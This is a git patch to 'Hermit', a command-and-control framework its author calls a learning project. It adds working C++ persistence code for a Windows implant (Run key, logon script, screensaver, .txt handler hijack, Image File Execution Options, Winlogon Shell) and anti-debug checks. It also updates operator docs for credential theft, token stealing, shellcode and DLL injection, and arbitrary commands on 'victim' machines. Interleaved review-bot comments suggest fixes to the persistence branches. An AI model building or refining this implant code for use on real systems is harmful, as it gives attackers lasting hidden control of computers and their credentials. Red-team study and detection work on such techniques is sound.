From d401b2c5aafe1219810512bc3f848250a57f7221 Mon Sep 17 00:00:00 2001
From: hdks
Date: Mon, 13 May 2024 01:12:59 +0900
Subject: [PATCH] Add other persistence techniques for implant.
---
README.md | 8 +-
docs/guides/task.md | 174 ++++++++-
docs/index.md | 8 +-
docs/tutorials/simple-dll-injection.md | 4 +-
docs/tutorials/simple-implant-beacon.md | 20 +-
payload/win/implant/CMakeLists.txt | 10 +-
payload/win/implant/include/core/procs.hpp | 16 +-
.../win/implant/include/core/technique.hpp | 11 +
payload/win/implant/include/hermit.hpp | 1 +
payload/win/implant/script/calc_api_hash.py | 2 +
payload/win/implant/src/core/procs.cpp | 10 +-
payload/win/implant/src/core/task/persist.cpp | 214 ++++++++++-
.../implant/src/core/technique/anti_debug.cpp | 39 ++
payload/win/implant/src/hermit.cpp | 13 +
payload/win/implant/src/main/beacon_dll.cpp | 5 +
payload/win/implant/src/main/beacon_exe.cpp | 5 +
payload/win/loader/CMakeLists.txt | 10 +-
payload/win/loader/include/core/procs.hpp | 8 +
payload/win/loader/include/core/technique.hpp | 11 +
payload/win/loader/script/calc_api_hash.py | 2 +
payload/win/loader/src/core/procs.cpp | 56 +--
.../loader/src/core/technique/anti_debug.cpp | 39 ++
payload/win/loader/src/hermit.cpp | 25 +-
pkg/client/rpc/request.go | 2 +
pkg/common/parser/amtaskcommand.go | 6 +-
pkg/common/wizard/payload.go | 26 ++
pkg/protobuf/rpcpb/rpc.pb.go | 348 +++++++++---------
pkg/protobuf/rpcpb/rpc.proto | 2 +
pkg/server/payload/implant.go | 4 +
pkg/server/payload/loader.go | 4 +
pkg/server/rpc/grpc.go | 2 +
31 files changed, 842 insertions(+), 243 deletions(-)
create mode 100644 payload/win/implant/src/core/technique/anti_debug.cpp
create mode 100644 payload/win/loader/src/core/technique/anti_debug.cpp
diff --git a/README.md b/README.md
index a57fc8e..f9c9785 100644
--- a/README.md
+++ b/README.md
@@ -19,8 +19,12 @@ I'm developing this for my learning purpose. - gRPC server/client for operations. - TLS for secure communication between the C2 server, client and agents. - HTTPS listener. -- Multi staged payloads. -- SQLite for the data persistence. +- Multi-Staged Payload +- Data Encryption. +- Common Evasion Techniques +- Common Persistence Techniques +- Anti-Debug +- SQLite for saving data
diff --git a/docs/guides/task.md b/docs/guides/task.md index 9388299..89be43e 100644 --- a/docs/guides/task.md +++ b/docs/guides/task.md @@ -7,18 +7,19 @@ Currently, the following tasks are available: ```txt TASK: + assembly Load and execute .NET assembly. cat Read contents of a file. cd Change the working directory. + cmd Execute arbitrary system command. connect Change listener URL to connect. cp Copy a file. creds steal Steal credentials from various resources on the target computer - dll Load DLL and inject modules into the specified process + dll Load DLL and inject modules into the specified process. download Download a file. env ls List environment variables. envs alias for 'env ls' - execute Execute system command. group ls List local groups. - groups Alias for 'group ls' + groups Alias for 'group ls'. history Retrieve information from history files of applications ip Print the network interface information on target computer jitter Set jitter time (seconds) between requests from beacon @@ -30,6 +31,8 @@ TASK: mkdir Create a new directory. mv Move a file to a destination location. net Get TCP connections. + pe Load and execute PE (Portable Executable) file. + persist Establish persistence for implant. procdump Dump process memory to a specified output file. ps kill Terminate a process. ps ls List processes. 
@@ -42,13 +45,13 @@ TASK: rportfwd rm Stop and remove listener for reverse port forwarding. runas Execute a program as another user. screenshot Take a screenshot on target computer. - shellcode Inject shellcode into the specified process - sleep Set sleep time (seconds) between requests from beacon + shellcode Inject shellcode into the specified process. + sleep Set sleep time (seconds) between requests from beacon. token revert Revert back to the original process token. token steal Steal token from the specified process and impersonate process. upload Upload a file to the target computer. user ls List users. - users List all local users. + users Alias for 'user ls'. whoami Print the current user information. ``` @@ -78,6 +81,14 @@ Or you can use a normal slash (`/`) instead of a backslash: Hermit [agent-abcd] > cd "C:/Program Files/" ``` +## `cmd` + +Executes an arbitrary system command. + +```sh +Hermit [agent-abcd] > cmd "dir -Force" +``` + ## `connect` Changes the connected listener URL to new one. @@ -101,7 +112,9 @@ Hermit [agent-abcd] > cp /tmp/example.txt ./example.txt Injects DLL into specified process. ```sh -Hermit [agent-abcd] > dll --pid 1234 --dll /path/to/example.dll +# -p: target process ID +# -f: a DLL file path +Hermit [agent-abcd] > dll -p 1234 -f /path/to/example.dll ``` To see running processes and check PIDs, use `ps ls` task. @@ -120,13 +133,11 @@ Hermit [agent-abcd] > download C:/Users/John/Desktop/example.txt /tmp/example.tx Lists environment variables in victim machine. -## `execute` +## `group` -Executes system command in victim machine. +### `group ls`, `groups` -```sh -Hermit [agent-abcd] > execute notepad.exe -``` +Lists local groups in victim machine. ## `jitter` @@ -159,6 +170,10 @@ Specify in **UTC**. And the format is such like `2025-01-01 00:00:00`. Hermit [agent-abcd] > killdate 2025-01-01 06:01:20 ``` +## `ls` + +Lists files in current working directory in victim machine. + ## `migrate` Migrates the implant to another process. 
@@ -170,6 +185,14 @@ Hermit [agent-abcd] > migrate 1234 To see running processes and PIDs, use `ps ls` task. +## `mkdir` + +Creates a new directory in current working directory in victim machine. + +```sh +Hermit [agent-abcd] > mkdir new_dir +``` + ## `mv` Move a file to specified place. 
@@ -178,17 +201,101 @@ Move a file to specified place. Hermit [agent-abcd] > mv ./example.txt C:/Users/John/Documents/example.txt ``` +## `net` + +Prints open ip/ports. + +## `pe` + +Loads and executes a Portable Executable (`.exe`) file. + +```sh +# -f: an executable file path +Hermit [agent-abcd] > pe -f /path/to/example.exe +``` + ## `persist` Make the implant persistence. -After running `persist` command, we can select the technique. ```sh Hermit [agent-abcd] > persist ``` -- **registry/runkey** - Add the entry (the implant file path) to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. +We can select the persistence technique in wizard. + +### Technique 1: `runkey` + +Add an entry (the implant path) to `HKCU\Software\Microsoft\Windows\CurrentVersion\Run`. +The implant will run every time the victim machine starts. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run" -Name "RandomName" +``` + +Replace the `RandomName` with the actual name which is randomly generated strings. To see the name, check with **Registry Editor (regedit)**. + +### Technique 2: `user-init-mpr-logon-script` + +Uses `UserInitMprLogonScript`. +Add an entry (the imaplant path) to `HKCU\Environment`. +The implant will run every time a user logs in. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Environment" -Name "UserInitMprLogonScript" +``` + +### Technique 3: `screensaver` + +Add an entry (the implant path) to `HKCU\Control Panel\Desktop`. +The implant will run after a period of user inactivity. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'ScreenSaveTimeOut' +Remove-ItemProperty -Path "HKCU:\Control Panel\Desktop" -Name 'SCRNSAVE.EXE' +``` + +### Technique 4: `default-file-extension-hijacking` + +Update an entry for `HKEY_CLASSES_ROOT\txtfile\shell\open\command`. 
+Overwrite the default application when clicking a `.txt` file. It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +reg add "HKEY_CLASSES_ROOT\txtfile\shell\open\command" /ve /t REG_EXPAND_SZ /d "%SystemRoot%\system32\NOTEPAD.EXE %1" +``` + +### Technique 5: `ifeo` + +Uses **Image File Execution Options**. +Write entries for `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe` and `HKLM\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe`. +It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\notepad.exe" -Name 'GlobalFlag' +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'ReportingMode' +Remove-ItemProperty -Path "HKLM:\Software\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\notepad.exe" -Name 'MonitorProcess' +``` + +### Technique 6: `winlogon` + +Add an entry (the implant path) to `HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon`. +The implant will run every time a user logs on. It's required to **Administrator** privilege. + +Cleanup: + +```powershell title="Windows Victim Machine" +reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "Shell" /t REG_SZ /d "explorer.exe" /f +``` ## `procdump` @@ -218,6 +325,10 @@ Hermit [agent-abcd] > ps kill 1234 Lists all running processes. +## `pwd` + +Prints the current working directory. + ## `reg` Manages registy keys. 
@@ -230,6 +341,26 @@ Retrieve registry values. For recursively, add `-r` flag. Hermit [agent-abcd] > reg query "HKLM\\SOFTWARE\\Microsoft" -r ``` +## `rm` + +Removes a file. + +```sh +Hermit [agent-abcd] > rm example.txt +``` + +## `rmdir` + +Removes a directory. + +```sh +Hermit [agent-abcd] > rmdir example_dir +``` + +## `rportfwd` + +Under development. + ## `runas` Runs a command as another user. @@ -253,7 +384,9 @@ After successful, the captured image file is saved under `$HOME/.hermit/server/a Injects shellcode to specified process. ```sh -Hermit [agent-abcd] > shellcode --pid 1234 -s /path/to/shellcode.bin +# -p: target process ID +# -f: a shellcode file path +Hermit [agent-abcd] > shellcode -p 1234 -f /path/to/shellcode.bin ``` To see running processes and PIDs, use `ps ls` task. @@ -306,8 +439,13 @@ Lists local users. ## `whoami` Prints current user information on victim machine. -To print the privileges, add `--priv` flag. ```sh Hermit [agent-abcd] > whoami -``` \ No newline at end of file +``` + +To print the privileges, add `--priv` flag. + +```sh +Hermit [agent-abcd] > whoami --priv +``` diff --git a/docs/index.md b/docs/index.md index 3a7296c..e2d3b3e 100644 --- a/docs/index.md +++ b/docs/index.md @@ -12,8 +12,12 @@ Hermit is a command and control framework written in Go. - gRPC server/client for operations. - TLS for secure communication between the C2 server, client and agents. - HTTPS listener. -- Multi staged payloads. -- SQLite for the data persistence. +- Multi-Staged Payload +- Data Encryption. +- Common Evasion Techniques +- Common Persistence Techniques +- Anti-Debug +- SQLite for saving data ![diagram](assets/diagram.png) diff --git a/docs/tutorials/simple-dll-injection.md b/docs/tutorials/simple-dll-injection.md index 1a2283c..28b3f5b 100644 --- a/docs/tutorials/simple-dll-injection.md +++ b/docs/tutorials/simple-dll-injection.md 
@@ -1,9 +1,11 @@ # Simple DLL Injection -In this tutorial, we generate **DLL Implant** and **Loader** which loads the DLL into memory on Windows victim machine. Then make the C2 agent to communicate with our C2 server. +In this tutorial, we generate **DLL Implant** and **Loader** which loads the DLL into memory on Windows victim machine. Then make the C2 agent to communicate with our C2 server. Assume that you've completed [the Simple Implant Beacon tutorial](./simple-implant-beacon.md). +> IMPORTANT: It's heavily recommended to use **a virtual machine** for Windows victim machine because If we modify the registry etc., the system might not work properly. + ## 1. Start C2 Server In the Hermit project root, start the C2 server: diff --git a/docs/tutorials/simple-implant-beacon.md b/docs/tutorials/simple-implant-beacon.md index 34aca6c..edf37e8 100644 --- a/docs/tutorials/simple-implant-beacon.md +++ b/docs/tutorials/simple-implant-beacon.md @@ -5,6 +5,8 @@ This page introduces the basic usage of execute the implant beacon on Windows vi Assume that you've already installed Hermit. If not yet, see [the Installation page](../installation.md) and try [Getting Started](../getting-started.md). +> IMPORTANT: It's heavily recommended to use **a virtual machine** for Windows victim machine because If we modify the registry etc., the system might not work properly. + ## 1. Start C2 Server Go to the Hermit project directory then run `./hermit` command. 
@@ -73,18 +75,19 @@ Currently, the following tasks are available: ```txt title="Hermit C2 Server Console [Agent Mode]" TASK: + assembly Load and execute .NET assembly. cat Read contents of a file. cd Change the working directory. + cmd Execute arbitrary system command. connect Change listener URL to connect. cp Copy a file. creds steal Steal credentials from various resources on the target computer - dll Load DLL and inject modules into the specified process + dll Load DLL and inject modules into the specified process. download Download a file. env ls List environment variables. envs alias for 'env ls' - execute Execute system command. group ls List local groups. - groups Alias for 'group ls' + groups Alias for 'group ls'. history Retrieve information from history files of applications ip Print the network interface information on target computer jitter Set jitter time (seconds) between requests from beacon @@ -96,12 +99,13 @@ TASK: mkdir Create a new directory. mv Move a file to a destination location. net Get TCP connections. + pe Load and execute PE (Portable Executable) file. + persist Establish persistence for implant. procdump Dump process memory to a specified output file. ps kill Terminate a process. ps ls List processes. pwd Print the current working directory. - reg subkeys Enumerate subkeys for the specified open registry key. - reg values Enumerate the specified registry values. + reg query Enumerate subkeys for the specified path. rm Remove a file. rmdir Remove a directory. rportfwd add Add settings to reverse port forwarding. 
@@ -109,13 +113,13 @@ TASK: rportfwd rm Stop and remove listener for reverse port forwarding. runas Execute a program as another user. screenshot Take a screenshot on target computer. - shellcode Inject shellcode into the specified process - sleep Set sleep time (seconds) between requests from beacon + shellcode Inject shellcode into the specified process. + sleep Set sleep time (seconds) between requests from beacon. token revert Revert back to the original process token. token steal Steal token from the specified process and impersonate process. upload Upload a file to the target computer. user ls List users. - users List all local users. + users Alias for 'user ls'. whoami Print the current user information. ``` diff --git a/payload/win/implant/CMakeLists.txt b/payload/win/implant/CMakeLists.txt index 51d2ab6..3f6d851 100644 --- a/payload/win/implant/CMakeLists.txt +++ b/payload/win/implant/CMakeLists.txt @@ -32,6 +32,9 @@ add_compile_definitions(PAYLOAD_TYPE=${PAYLOAD_TYPE}) if(${PAYLOAD_INDIRECT_SYSCALLS} STREQUAL "true") add_compile_definitions(PAYLOAD_INDIRECT_SYSCALLS=${PAYLOAD_INDIRECT_SYSCALLS}) endif() +if(${PAYLOAD_ANTI_DEBUG} STREQUAL "true") + add_compile_definitions(PAYLOAD_ANTI_DEBUG=${PAYLOAD_ANTI_DEBUG}) +endif() add_compile_definitions(LISTENER_PROTOCOL=${LISTENER_PROTOCOL}) add_compile_definitions(LISTENER_HOST=${LISTENER_HOST}) add_compile_definitions(LISTENER_PORT=${LISTENER_PORT}) @@ -74,9 +77,6 @@ set(SOURCE_CORE src/core/system/process.cpp src/core/system/registry.cpp src/core/system/user.cpp - src/core/technique/injection/dll_injection.cpp - src/core/technique/injection/pe_injection.cpp - src/core/technique/injection/shellcode_injection.cpp src/core/task/assembly.cpp src/core/task/cat.cpp src/core/task/cd.cpp 
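Review bot: The added `if(${PAYLOAD_ANTI_DEBUG} STREQUAL "true")` in payload/win/implant/CMakeLists.txt expands the variable unquoted, so when PAYLOAD_ANTI_DEBUG is unset or empty the condition collapses to `if( STREQUAL "true")` and configuration fails instead of defaulting to off. Quote the expansion, `if("${PAYLOAD_ANTI_DEBUG}" STREQUAL "true")`; the PAYLOAD_INDIRECT_SYSCALLS test in the context lines just above has the same form, and the same new lines appear in the payload/win/loader/CMakeLists.txt hunk. A one-line comment that the definition is only tested with `#ifdef` in beacon_exe.cpp and beacon_dll.cpp would also explain why its value does not matter.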
@@ -116,6 +116,10 @@ set(SOURCE_CORE src/core/task/upload.cpp src/core/task/user.cpp src/core/task/whoami.cpp + src/core/technique/anti_debug.cpp + src/core/technique/injection/dll_injection.cpp + src/core/technique/injection/pe_injection.cpp + src/core/technique/injection/shellcode_injection.cpp src/core/utils/convert.cpp src/core/utils/random.cpp src/core/utils/split.cpp diff --git a/payload/win/implant/include/core/procs.hpp b/payload/win/implant/include/core/procs.hpp index 7cf3e19..a76a38a 100644 --- a/payload/win/implant/include/core/procs.hpp +++ b/payload/win/implant/include/core/procs.hpp @@ -60,10 +60,12 @@ #define APIHASH_RTLSTRINGCCHCOPYW 0x32231e60 #define APIHASH_RTLSTRINGCCHLENGTHW 0x28821d8f #define APIHASH_RTLZEROMEMORY 0x899c0d1e +#define APIHASH_CHECKREMOTEDEBUGGERPRESENT 0x478dd921 #define APIHASH_CLOSEHANDLE 0x47bdd9cb #define APIHASH_CREATETHREADPOOLWAIT 0x7a8370ac #define APIHASH_DLLMAIN 0xe2e2f348 #define APIHASH_GETPROCADDRESS 0xafa3e09d +#define APIHASH_ISDEBUGGERPRESENT 0xef4ed1b #define APIHASH_LOADLIBRARYA 0x7069f241 #define APIHASH_LOADLIBRARYW 0x7069f257 #define APIHASH_MESSAGEBOXA 0xcc4a1d08 @@ -210,12 +212,16 @@ namespace Procs // **WINAPIs** - // DllMain - typedef BOOL (WINAPI* LPPROC_DLLMAIN)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); + // CheckRemoteDebuggerPresent + typedef BOOL (WINAPI* LPPROC_CHECKREMOTEDEBUGGERPRESENT)(HANDLE hProcess, PBOOL pbDebuggerPresent); // CloseHandle typedef BOOL (WINAPI* LPPROC_CLOSEHANDLE)(HANDLE hObject); + // DllMain + typedef BOOL (WINAPI* LPPROC_DLLMAIN)(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved); // GetProcAddress typedef FARPROC (WINAPI* LPPROC_GETPROCADDRESS)(HMODULE hModule, LPCSTR lpProcName); + // IsDebuggerPresent + typedef BOOL (WINAPI* LPPROC_ISDEBUGGERPRESENT)(); // LoadLibraryA typedef HMODULE (WINAPI* LPPROC_LOADLIBRARYA)(LPCSTR lpLibFileName); // LoadLibraryW 
@@ -259,7 +265,7 @@ namespace Procs struct PROCS { - // **NATIVE APIs** + // **NTAPI** LPPROC_NTADJUSTPRIVILEGESTOKEN lpNtAdjustPrivilegesToken = nullptr; LPPROC_NTALLOCATEVIRTUALMEMORY lpNtAllocateVirtualMemory = nullptr; LPPROC_NTCLOSE lpNtClose = nullptr; @@ -307,7 +313,9 @@ namespace Procs LPPROC_RTLSTRINGCCHLENGTHW lpRtlStringCchLengthW = nullptr; LPPROC_RTLZEROMEMORY lpRtlZeroMemory = nullptr; - // **WINAPIs** + // **WINAPI** + LPPROC_CHECKREMOTEDEBUGGERPRESENT lpCheckRemoteDebuggerPresent = nullptr; + LPPROC_ISDEBUGGERPRESENT lpIsDebuggerPresent = nullptr; LPPROC_QUERYFULLPROCESSIMAGENAMEW lpQueryFullProcessImageNameW = nullptr; LPPROC_SETFILEINFORMATIONBYHANDLE lpSetFileInformationByHandle = nullptr; LPPROC_WINHTTPCLOSEHANDLE lpWinHttpCloseHandle = nullptr; diff --git a/payload/win/implant/include/core/technique.hpp b/payload/win/implant/include/core/technique.hpp index aec920e..a32cfaf 100644 --- a/payload/win/implant/include/core/technique.hpp +++ b/payload/win/implant/include/core/technique.hpp @@ -16,6 +16,17 @@ typedef BOOL (WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID); #define DEREF_16(name)*(WORD *)(name) #define DEREF_8(name)*(BYTE *)(name) +// Used for Anti-Debug +#define FLG_HEAP_ENABLE_TAIL_CHECK 0x10 +#define FLG_HEAP_ENABLE_FREE_CHECK 0x20 +#define FLG_HEAP_VALIDATE_PARAMETERS 0x40 +#define NT_GLOBAL_FLAG_DEBUGGED (FLG_HEAP_ENABLE_TAIL_CHECK | FLG_HEAP_ENABLE_FREE_CHECK | FLG_HEAP_VALIDATE_PARAMETERS) + +namespace Technique::AntiDebug +{ + VOID StopIfDebug(Procs::PPROCS pProcs); +} + namespace Technique::Injection::Helper { DWORD Rva2Offset(DWORD dwRva, UINT_PTR uBaseAddr); diff --git a/payload/win/implant/include/hermit.hpp b/payload/win/implant/include/hermit.hpp index b4f1094..03ad738 100644 --- a/payload/win/implant/include/hermit.hpp +++ b/payload/win/implant/include/hermit.hpp 
@@ -13,6 +13,7 @@ namespace Hermit INT nCmdShow, LPCWSTR lpPayloadType, BOOL bIndirectSyscalls, + BOOL bAntiDebug, LPCWSTR lpProtocol, LPCWSTR lpHost, INTERNET_PORT nPort, diff --git a/payload/win/implant/script/calc_api_hash.py b/payload/win/implant/script/calc_api_hash.py index 000abec..8fb8f44 100644 --- a/payload/win/implant/script/calc_api_hash.py +++ b/payload/win/implant/script/calc_api_hash.py @@ -53,10 +53,12 @@ "RtlZeroMemory", # WINAPIS + "CheckRemoteDebuggerPresent", "CloseHandle", "CreateThreadpoolWait", "DllMain", "GetProcAddress", + "IsDebuggerPresent", "LoadLibraryA", "LoadLibraryW", "MessageBoxA", diff --git a/payload/win/implant/src/core/procs.cpp b/payload/win/implant/src/core/procs.cpp index cf82d16..d441b84 100644 --- a/payload/win/implant/src/core/procs.cpp +++ b/payload/win/implant/src/core/procs.cpp @@ -60,7 +60,7 @@ namespace Procs ) { PPROCS pProcs = new PROCS; - // NT APIs + // NTAPI PVOID pNtAdjustPrivilegesToken = GetProcAddressByHash(hNTDLL, APIHASH_NTADJUSTPRIVILEGESTOKEN); pProcs->lpNtAdjustPrivilegesToken = reinterpret_cast(pNtAdjustPrivilegesToken); PVOID pNtAllocateVirtualMemory = GetProcAddressByHash(hNTDLL, APIHASH_NTALLOCATEVIRTUALMEMORY); 
@@ -148,9 +148,13 @@ namespace Procs PVOID pRtlZeroMemory = GetProcAddressByHash(hNTDLL, APIHASH_RTLZEROMEMORY); pProcs->lpRtlZeroMemory = reinterpret_cast(pRtlZeroMemory); - // WINAPIs + // WINAPI + PVOID pCheckRemoteDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_CHECKREMOTEDEBUGGERPRESENT); + pProcs->lpCheckRemoteDebuggerPresent = reinterpret_cast(pCheckRemoteDebuggerPresent); + PVOID pIsDebuggerPresent = GetProcAddressByHash(hKernel32DLL, APIHASH_ISDEBUGGERPRESENT); + pProcs->lpIsDebuggerPresent = reinterpret_cast(pIsDebuggerPresent); PVOID pQueryFullProcessImageNameW = GetProcAddressByHash(hKernel32DLL, APIHASH_QUERYFULLPROCESSIMAGENAMEW); - pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(GetProcAddress(hKernel32DLL, "QueryFullProcessImageNameW")); + pProcs->lpQueryFullProcessImageNameW = reinterpret_cast(pQueryFullProcessImageNameW); PVOID pSetFileInformationByHandle = GetProcAddressByHash(hKernel32DLL, APIHASH_SETFILEINFORMATIONBYHANDLE); pProcs->lpSetFileInformationByHandle = reinterpret_cast(pSetFileInformationByHandle); PVOID pWinHttpCloseHandle = GetProcAddressByHash(hWinHTTPDLL, APIHASH_WINHTTPCLOSEHANDLE); diff --git a/payload/win/implant/src/core/task/persist.cpp b/payload/win/implant/src/core/task/persist.cpp index 20bad29..030e39d 100644 --- a/payload/win/implant/src/core/task/persist.cpp +++ b/payload/win/implant/src/core/task/persist.cpp @@ -12,15 +12,15 @@ namespace Task return L"Error: Failed to get the program path."; } + LPCWSTR lpSelfPath = wSelfPath; + + // Persistence process if (wcscmp(wTechnique.c_str(), L"runkey") == 0) { - // Add an entry to Registry Run. HKEY hKey; std::wstring wSubKey = L"Software\\Microsoft\\Windows\\CurrentVersion\\Run"; std::wstring wValue = Utils::Random::RandomString(8); - LPCWSTR lpData = wSelfPath; - LONG result = RegOpenKeyExW( HKEY_CURRENT_USER, wSubKey.c_str(), 
@@ -29,26 +29,67 @@ namespace Task &hKey ); if (result != ERROR_SUCCESS) + { return L"Error: Failed to open key."; + } result = RegSetValueExW( hKey, wValue.c_str(), 0, REG_SZ, - (BYTE*)lpData, - (wcslen(lpData) + 1) * sizeof(WCHAR) + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } + else if (wcscmp(wTechnique.c_str(), L"user-init-mpr-logon-script") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"Environment"; + + LONG result = RegOpenKeyExW( + HKEY_CURRENT_USER, + wSubKey.c_str(), + 0, + KEY_SET_VALUE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + result = RegSetValueExW( + hKey, + L"UserInitMprLogonScript", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) ); RegCloseKey(hKey); if (result == ERROR_SUCCESS) + { return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; + } else + { return L"Error: Failed to set value to registry."; + } } else if (wcscmp(wTechnique.c_str(), L"screensaver") == 0) { - // Write entries for screensaver. // Reference: https://cocomelonc.github.io/tutorial/2022/04/26/malware-pers-2.html HKEY hKey; std::wstring wSubKey = L"Control Panel\\Desktop"; 
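Review bot: The new `user-init-mpr-logon-script` branch passes `(wcslen(lpSelfPath) + 1) * sizeof(WCHAR)`, a `size_t`, as the `DWORD` size argument of `RegSetValueExW`, and its C-style `(BYTE*)` cast drops the `const` of `lpSelfPath`. I would write `reinterpret_cast<const BYTE*>(lpSelfPath)` and `static_cast<DWORD>((wcslen(lpSelfPath) + 1) * sizeof(WCHAR))`; the same two expressions appear in the `runkey` branch of this hunk and in the branches added by the later hunk of this file. The branch also carries no comment naming what it writes; something like `// Sets HKCU\Environment "UserInitMprLogonScript" to the implant path; delete that value to undo.` would keep the code in step with the cleanup section in docs/guides/task.md. The enclosing function starts and ends outside the hunk.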
@@ -109,6 +150,167 @@ namespace Task RegCloseKey(hKey); return L"Success: The entry has been set to HKCU\\" + wSubKey + L"."; } + else if (wcscmp(wTechnique.c_str(), L"default-file-extension-hijacking") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"txtfile\\shell\\open\\command"; + + LONG result = RegOpenKeyExW( + HKEY_CLASSES_ROOT, + wSubKey.c_str(), + 0, + KEY_WRITE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + result = RegSetValueExW( + hKey, + L"", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKCR\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } + else if (wcscmp(wTechnique.c_str(), L"ifeo") == 0) + { + // Reference: https://cocomelonc.github.io/malware/2022/09/10/malware-pers-10.html + HKEY hKey; + DWORD dwGF = 512; + DWORD dwRM = 1; + + const WCHAR* wImg = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Image File Execution Options\\notepad.exe"; + const WCHAR* wSilent = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\SilentProcessExit\\notepad.exe"; + + // GlobalFlag + if (RegCreateKeyExW( + HKEY_LOCAL_MACHINE, + wImg, + 0, + nullptr, + REG_OPTION_NON_VOLATILE, + KEY_WRITE | KEY_QUERY_VALUE, + nullptr, + &hKey, + nullptr + ) != ERROR_SUCCESS) + { + return L"Error: Failed to create key: Image File Execution Options\\notepad.exe."; + } + + if (RegSetValueExW( + hKey, + L"GlobalFlag", + 0, + REG_DWORD, + (const BYTE*)&dwGF, + sizeof(dwGF) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set key."; + } + RegCloseKey(hKey); + + if (RegCreateKeyExW( + HKEY_LOCAL_MACHINE, + wSilent, + 0, + nullptr, + REG_OPTION_NON_VOLATILE, + KEY_WRITE | KEY_QUERY_VALUE, + nullptr, + &hKey, + nullptr + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to create key: 
SilentProcessExit\\notepad.exe."; + } + + if (RegSetValueExW( + hKey, + L"ReportingMode", + 0, + REG_DWORD, + (const BYTE*)&dwRM, + sizeof(dwRM) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set ReportingMode."; + } + if (RegSetValueExW( + hKey, + L"MonitorProcess", + 0, + REG_SZ, + (BYTE*)lpSelfPath, + (wcslen(lpSelfPath) + 1) * sizeof(WCHAR) + ) != ERROR_SUCCESS) + { + RegCloseKey(hKey); + return L"Error: Failed to set MonitorProcess."; + } + + RegCloseKey(hKey); + return L"Success: The entry has been set to HKLM\\" + std::wstring(wImg) + L" and HKLM\\" + std::wstring(wSilent) + L"."; + } + else if (wcscmp(wTechnique.c_str(), L"winlogon") == 0) + { + HKEY hKey; + std::wstring wSubKey = L"Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"; + std::wstring wValue = Utils::Random::RandomString(8); + + LONG result = RegOpenKeyExW( + HKEY_LOCAL_MACHINE, + wSubKey.c_str(), + 0, + KEY_WRITE, + &hKey + ); + if (result != ERROR_SUCCESS) + { + return L"Error: Failed to open key."; + } + + std::wstring wExecutables = L"explorer.exe," + std::wstring(wSelfPath); + LPCWSTR lpExecutables = wExecutables.c_str(); + Stdout::DisplayMessageBoxW(lpExecutables, L"lpExecutables"); + + result = RegSetValueExW( + hKey, + L"Shell", + 0, + REG_SZ, + (BYTE*)lpExecutables, + (wcslen(lpExecutables) + 1) * sizeof(WCHAR) + ); + RegCloseKey(hKey); + + if (result == ERROR_SUCCESS) + { + return L"Success: The entry has been set to HKLM\\" + wSubKey + L"."; + } + else + { + return L"Error: Failed to set value to registry."; + } + } else { return L"Not implemented yet."; diff --git a/payload/win/implant/src/core/technique/anti_debug.cpp b/payload/win/implant/src/core/technique/anti_debug.cpp new file mode 100644 index 0000000..d40c7dc --- /dev/null +++ b/payload/win/implant/src/core/technique/anti_debug.cpp 
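Review bot: In the `ifeo` branch the failure path of the second `RegCreateKeyExW` (the SilentProcessExit key) calls `RegCloseKey(hKey)` although `hKey` was already closed right after the `GlobalFlag` write, and a failed create is not documented to hand back a handle; that `RegCloseKey(hKey);` should be dropped. In the `winlogon` branch `std::wstring wValue = Utils::Random::RandomString(8);` is never used and can go. The `default-file-extension-hijacking` and `winlogon` branches replace an existing value without reading it first, so the previous data is lost; a comment such as `// Overwrites the existing "Shell" value; the prior data is not saved, restore it per docs/guides/task.md.` would make that explicit for anyone cleaning up a test host. The enclosing function starts outside the hunk.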
